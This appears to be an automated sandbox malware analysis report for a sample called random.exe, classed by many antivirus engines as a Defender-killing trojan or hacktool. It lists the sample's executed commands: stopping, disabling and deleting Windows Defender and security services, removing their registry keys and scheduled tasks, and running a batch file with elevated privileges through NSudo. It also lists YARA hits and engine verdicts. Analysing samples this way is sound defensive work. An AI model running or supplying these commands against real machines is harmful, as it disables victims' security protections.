random.exe| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6401 | April 28, 2025, 10:09 a.m. | April 28, 2025, 10:11 a.m. |
-
-
-
-
chcp.com chcp 65001
2816 -
reg.exe reg query "HKU\S-1-5-19"
2884 -
reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
2928 -
-
-
-
chcp.com chcp 65001
2204 -
reg.exe reg query "HKU\S-1-5-19"
2244 -
reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
2424 -
mode.com Mode 79,49
2524 -
cmd.exe C:\Windows\system32\cmd.exe /c ver
2576 -
reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
2688 -
find.exe find /i "0x0"
2564 -
-
tasklist.exe tasklist
2872
-
-
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
2868 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
604 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
2988 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
1356 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
1384 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
2472 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
2544 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
2612 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
2800 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
2924 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
2372 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
2080 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
148 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
2320 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
2532 -
reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
2608 -
reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
2904 -
reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
2392 -
find.exe find /i "Windows 7"
192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
2240 -
findstr.exe findstr /c:"6.1.7601"
2672 -
sc.exe sc config "WinDefend" start= disabled
2956 -
sc.exe sc stop "WinDefend"
2784 -
sc.exe sc delete "WinDefend"
2380 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
2520 -
sc.exe sc config "MDCoreSvc" start= disabled
884 -
sc.exe sc stop "MDCoreSvc"
560 -
sc.exe sc delete "MDCoreSvc"
2208 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
504 -
sc.exe sc config "WdNisSvc" start= disabled
2720 -
sc.exe sc stop "WdNisSvc"
1120 -
sc.exe sc delete "WdNisSvc"
2776 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
1796 -
sc.exe sc config "Sense" start= disabled
2652 -
sc.exe sc stop "Sense"
2064 -
sc.exe sc delete "Sense"
2052 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
1864 -
sc.exe sc config "wscsvc" start= disabled
232 -
sc.exe sc stop "wscsvc"
1892 -
sc.exe sc delete "wscsvc"
1852 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
1560 -
sc.exe sc config "SgrmBroker" start= disabled
3108 -
sc.exe sc stop "SgrmBroker"
3156 -
sc.exe sc delete "SgrmBroker"
3204 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
3252 -
sc.exe sc config "SecurityHealthService" start= disabled
3300 -
sc.exe sc stop "SecurityHealthService"
3348 -
sc.exe sc delete "SecurityHealthService"
3396 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
3444 -
sc.exe sc config "webthreatdefsvc" start= disabled
3488 -
sc.exe sc stop "webthreatdefsvc"
3536 -
sc.exe sc delete "webthreatdefsvc"
3584 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
3632 -
sc.exe sc config "webthreatdefusersvc" start= disabled
3676 -
sc.exe sc stop "webthreatdefusersvc"
3732 -
sc.exe sc delete "webthreatdefusersvc"
3780 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
3852 -
sc.exe sc config "WdNisDrv" start= disabled
3896 -
sc.exe sc stop "WdNisDrv"
3944 -
sc.exe sc delete "WdNisDrv"
3992 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
4040 -
sc.exe sc config "WdBoot" start= disabled
4084 -
sc.exe sc stop "WdBoot"
3128 -
sc.exe sc delete "WdBoot"
3188 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
1108 -
sc.exe sc config "WdFilter" start= disabled
3316 -
sc.exe sc stop "WdFilter"
3376 -
sc.exe sc delete "WdFilter"
3460 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
3532 -
sc.exe sc config "SgrmAgent" start= disabled
3600 -
sc.exe sc stop "SgrmAgent"
3660 -
sc.exe sc delete "SgrmAgent"
1632 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
3680 -
sc.exe sc config "MsSecWfp" start= disabled
3796 -
sc.exe sc stop "MsSecWfp"
3848 -
sc.exe sc delete "MsSecWfp"
3924 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
4012 -
sc.exe sc config "MsSecFlt" start= disabled
4072 -
sc.exe sc stop "MsSecFlt"
2932 -
sc.exe sc delete "MsSecFlt"
3216 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
3340 -
sc.exe sc config "MsSecCore" start= disabled
3428 -
sc.exe sc stop "MsSecCore"
3552 -
sc.exe sc delete "MsSecCore"
3664 -
reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
3692 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
3812 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
3964 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
4060 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
3184 -
schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
3248 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
3504 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
3648 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
3704 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
3844 -
reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
4036 -
reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
4008 -
reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
3352 -
reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
3564 -
reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
1316 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
3784 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
3236 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
3360 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
3880 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
3436 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
3588 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
3424 -
reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
3628 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
1320 -
sc.exe sc start VMTools
4124 -
sc.exe sc start VMTools
4172
-
-
-
-
-
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
| IP Address | Status | Action |
|---|---|---|
| No hosts contacted. | ||
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
| section |
| file | C:\Users\test22\AppData\Local\Temp\Work\nircmd.exe |
| file | C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe |
| file | C:\Users\test22\AppData\Local\Temp\Work\7z.exe |
| file | C:\Users\test22\AppData\Local\Temp\34.bat |
| file | C:\Users\test22\AppData\Local\Temp\24.bat |
| file | C:\Users\test22\AppData\Local\Temp\Work\cecho.exe |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f |
| cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f |
| cmdline | C:\Windows\system32\cmd.exe /c ver |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f |
| cmdline | C:\Windows\system32\cmd.exe /S /D /c" ver " |
| cmdline | C:\Windows\system32\cmd.exe /c tasklist |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f |
| file | C:\Users\test22\AppData\Local\Temp\34.bat |
| file | C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe |
| file | C:\Users\test22\AppData\Local\Temp\Work\cecho.exe |
| file | C:\Users\test22\AppData\Local\Temp\Work\7z.exe |
| wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
| section | {u'size_of_data': u'0x0001be00', u'virtual_address': u'0x00001000', u'entropy': 7.996205637989911, u'name': u'', u'virtual_size': u'0x00032000'} | entropy | 7.99620563799 | description | A section with a high entropy has been found | |||||||||
| section | {u'size_of_data': u'0x00004800', u'virtual_address': u'0x00033000', u'entropy': 7.973325024284936, u'name': u'', u'virtual_size': u'0x0000b000'} | entropy | 7.97332502428 | description | A section with a high entropy has been found | |||||||||
| section | {u'size_of_data': u'0x00000800', u'virtual_address': u'0x0003e000', u'entropy': 7.4688141552761795, u'name': u'', u'virtual_size': u'0x00025000'} | entropy | 7.46881415528 | description | A section with a high entropy has been found | |||||||||
| section | {u'size_of_data': u'0x00001000', u'virtual_address': u'0x00064000', u'entropy': 7.764550992600053, u'name': u'', u'virtual_size': u'0x00005000'} | entropy | 7.7645509926 | description | A section with a high entropy has been found | |||||||||
| section | {u'size_of_data': u'0x00098200', u'virtual_address': u'0x0036b000', u'entropy': 7.936454714357046, u'name': u'.data', u'virtual_size': u'0x00099000'} | entropy | 7.93645471436 | description | A section with a high entropy has been found | |||||||||
| entropy | 0.989361702128 | description | Overall entropy of this PE file is high | |||||||||||
| description | Create a windows service | rule | Create_Service | ||||||
| description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
| description | Communication using DGA | rule | Network_DGA | ||||||
| description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
| description | Take ScreenShot | rule | ScreenShot | ||||||
| description | Escalate priviledges | rule | Escalate_priviledges | ||||||
| description | Steal credential | rule | local_credential_Steal | ||||||
| description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
| description | Record Audio | rule | Sniff_Audio | ||||||
| description | Communications over HTTP | rule | Network_HTTP | ||||||
| description | Communications use DNS | rule | Network_DNS | ||||||
| description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
| description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
| description | (no description) | rule | ThreadControl__Context | ||||||
| description | (no description) | rule | SEH__vectored | ||||||
| description | (no description) | rule | Check_Dlls | ||||||
| description | Checks if being debugged | rule | anti_dbg | ||||||
| description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
| description | Bypass DEP | rule | disable_dep | ||||||
| description | Affect hook table | rule | win_hook | ||||||
| description | File Downloader | rule | Network_Downloader | ||||||
| description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
| description | Communications over FTP | rule | Network_FTP | ||||||
| description | Run a KeyLogger | rule | KeyLogger | ||||||
| description | Communications over P2P network | rule | Network_P2P_Win | ||||||
| description | Create a windows service | rule | Create_Service | ||||||
| description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
| description | Communication using DGA | rule | Network_DGA | ||||||
| description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
| description | Take ScreenShot | rule | ScreenShot | ||||||
| description | Escalate priviledges | rule | Escalate_priviledges | ||||||
| description | Steal credential | rule | local_credential_Steal | ||||||
| description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
| description | Record Audio | rule | Sniff_Audio | ||||||
| description | Communications over HTTP | rule | Network_HTTP | ||||||
| description | Communications use DNS | rule | Network_DNS | ||||||
| description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
| description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
| cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| cmdline | sc delete "MsSecCore" |
| cmdline | sc delete "wscsvc" |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f |
| cmdline | sc config "WdFilter" start= disabled |
| cmdline | sc delete "WinDefend" |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdFilter" |
| cmdline | sc stop "WdFilter" |
| cmdline | reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f |
| cmdline | sc delete "WdNisSvc" |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f |
| cmdline | sc stop "SgrmAgent" |
| cmdline | NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f |
| cmdline | C:\Users\test22\AppData\Local\Temp\34.bat |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f |
| cmdline | tasklist |
| cmdline | sc stop "webthreatdefsvc" |
| cmdline | reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\MsSecCore" |
| cmdline | sc stop "MsSecWfp" |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\wscsvc" |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc" |
| cmdline | schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f |
| cmdline | sc config "Sense" start= disabled |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f |
| cmdline | sc delete "WdNisDrv" |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc" |
| cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\WinDefend" |
| cmdline | sc config "MsSecCore" start= disabled |
| cmdline | sc config "webthreatdefsvc" start= disabled |
| cmdline | sc delete "WdBoot" |
| cmdline | sc stop "SgrmBroker" |
| cmdline | sc config "WdBoot" start= disabled |
| cmdline | reg query "HKU\S-1-5-19" |
| cmdline | sc config "SgrmAgent" start= disabled |
| cmdline | sc delete "Sense" |
| cmdline | reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f |
| cmdline | C:\Windows\system32\cmd.exe /c tasklist |
| cmdline | sc stop "WdBoot" |
| cmdline | reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f |
| cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f |
| cmdline | sc stop "MsSecCore" |
| cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
| cmdline | reg query "HKLM\System\CurrentControlSet\Services\WdBoot" |
| cmdline | sc delete "SecurityHealthService" |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet |
| Bkav | W32.AIDetectMalware |
| Cynet | Malicious (score: 100) |
| Skyhigh | BehavesLike.Win32.Generic.vc |
| ALYac | Trojan.Rasftuby.Gen.14 |
| Cylance | Unsafe |
| VIPRE | Trojan.Rasftuby.Gen.14 |
| CrowdStrike | win/grayware_confidence_60% (D) |
| BitDefender | Trojan.Rasftuby.Gen.14 |
| Arcabit | Trojan.Rasftuby.Gen.14 |
| Elastic | malicious (high confidence) |
| ESET-NOD32 | a variant of Win32/Packed.Enigma.AAF |
| APEX | Malicious |
| Avast | WAT:Blacked-E |
| ClamAV | Win.Trojan.Scar-6903585-0 |
| Kaspersky | HackTool.BAT.DefenderKiller.a |
| MicroWorld-eScan | Trojan.Rasftuby.Gen.14 |
| Emsisoft | Trojan.Rasftuby.Gen.14 (B) |
| F-Secure | Trojan.TR/Dropper.Gen |
| DrWeb | Tool.NirCmd.4 |
| McAfeeD | ti!E2AEF88DD7C7 |
| Trapmine | malicious.high.ml.score |
| CTX | exe.trojan.rasftuby |
| Sophos | Generic ML PUA (PUA) |
| Avira | TR/Dropper.Gen |
| Microsoft | Trojan:Win32/Tnega!ml |
| GData | Trojan.Rasftuby.Gen.14 |
| DeepInstinct | MALICIOUS |
| VBA32 | BScope.Trojan.Bitrep |
| Malwarebytes | AdRepack.Adware.Packer.DDS |
| Ikarus | Gen.Packer.PESpin |
| Zoner | Probably Heur.ExeHeaderL |
| Fortinet | Riskware/Application |
| AVG | WAT:Blacked-E |